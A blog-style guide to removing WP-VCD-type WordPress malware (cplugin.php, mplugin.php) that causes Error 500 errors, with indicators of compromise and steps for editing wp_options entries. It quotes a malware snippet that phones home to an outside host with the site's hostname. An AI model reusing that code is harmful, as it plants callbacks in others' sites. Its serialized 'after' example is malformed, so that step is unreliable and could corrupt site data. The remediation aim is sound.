WordPress Error 500 Due to Cplugin, Mplugin.php Malware: How To Remove Completely From Server

There is a recent server attack news coming out where numerous wordpress websites are taken down due to a file as ccode.php cplugin.php or mplugin.php or WP-VCD or blockspluginn.php which are malware. You must remove them completely from the server because they can make your server slow and you will get "Error 500" many times even your site doesn't have enough data or not using more plugins, still your facing slow server response time, error 500 and many more problem. This could be cause of Malware present on your server.

In this article, we have faced the same issue that is why we have to need to write this article so that everyone facing this kind of Malware problem, can solve it and remove malware thread or bad codes from server step-by-step.

What is Malware?

Malware is bad written codes which mostly causing "error 500" server runtime error. And it is better to delete it immediately as it migrates to all multiple websites on the server and has code to hit a malware URL to download additional files.

Here is a snippet of the malware code:

if(get_option('log_install') !=='1') {     if(!$log_installed = @file_get_contents("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"])) {     $log_installed = @file_get_contents_cplugin("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]); } }

We have figured out a solution and posting it to help all users out there.

There are many reports of the same file being named differently for users like as ccode.php, cplugin.php,  blockspluginn.php, mplugin.php, wp-vcd.php and helad.php in which case the fix can be modified.

How To Fix It And Remove Malwares From Server Completely?

This seems like some sort of global attack. There is a file cplugin.php/mplugin.php whatever the Malware code name in the plugins folder which is making your site slow and down. Deleting the file is of no use as it re-appears. Also if you are running more then one site on your server then it will infect all other sites too.

More We Recommend  14 Optimization Steps For Faster WordPress Website Performance (Without Plugin)

Fortunately, after working many hours we have figured out the how to fix Malware attacks and remove them completely from server.

Please read this carefully to fix your server and remove the malware:

Note: Just make sure take the backup of any file which you are going to modify it. Cause you will l going to modify the server files. If anything goes wrong you will never make it back.

We are assuming the file name as mplugin.php present in the server, to remove it:

The first step is Backup your database and the files.

The Second Step, Edit your wp_options table, find the property active_plugins and edit it, you will see it has a plugin entry for cplugin.php or mplugin.php or any other malware named. We have to delete it. Your initial data will look something like this:

a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;s:11:"mplugin.php";i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....

Edit this to remove the mplugin.php entry, start from i up to the next ; and remove that. (Make sure you Database is backed up in case you make some mistake). The new entry without the mplugin.php will look like:

a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"adinserter.php"....

The Third Step, Again follow this step similarly for the field in wp_option table named site_transient_update_plugins

Here is the before and after codes for your ease:

before: 

O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:11:"cplugin.php";s:3:"1.0";s:32:"duplicate-page/duplicatepage.php";.....

After:

O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:32:"duplicate-page/duplicatepage.php";.....

The Fourth Step, After saving your above fields, go back to your main plugins folder /wp-content/plugins and delete the file mplugin.php

The Fifth Step, Login to your wordpress dashboard and re-activate all your plugins.

Hurrah, Now you have fixed your website and server.

What Is The Cause Appearing again and again? Where It Comes From?

The technical reason for this would be that the malware registers itself as a wordpress plugin which automatically replaces the file upon deletion. Fortunately, the malware is badly written code so instead of running it mostly throws 500 error. But in any case, we would recommend to delete it immediately in case it updates.

More We Recommend  Top 5 Best SEO Optimized Themes for Wordpress

According to the wordpress forum thread on this topic, for some users simply renaming the file also makes the website work, which is probably due to the fact that renaming files in wordpress deactivates the plugin, due to which websites start working. But I would not keep infected files renamed and stored in any case, so would recommend the 1st solution at least after gaining access to the site.

However, This is not an attack, but malware included with nulled plugin or theme you downloaded and installed yourself. It is an updated version of WP-VCD, perhaps we should call it "WP-VCD Reloaded" 🙂

Indicators of Compromise are plugin files named as ccode.phpcplugin.phphelad.php, and mplugin.php (and admin_ips.txt) in wp-content/plugins and plugins / themes with file class.plugin-modules.php or class.theme-modules.php somewhere in their folder.

You can also check wp-includes/functions.php on your database f there any more 'mplugin' or 'cplugin' left behind or not.

Here's is quick review about this problem:

Time needed: 20 minutes.

How to remove Malware/Threads from server side which is causing Error 500, making slow down your site:

  1. Backup

    Backup your site before getting stuck and make everything wrong.

  2. Edit the file wp-options as above.

    Go php.admin>wp-options and find the above files and edit them accordingly. Don't forget to save them.

  3. Delete the thread files

    Delete the mplugin.php or cplugin.php file from folder /wp-content/plugins.

  4. Activate your plugins

    Login to your wordpress dashboard and re-activate your all pugins.

For more, You can also check out Blogging related articles down here.

Ping us on social media for any queries and suggestions.

Follow us on Twitter, InstagramRedditTelegram, and Google News for more latest news and updates.

Back To Top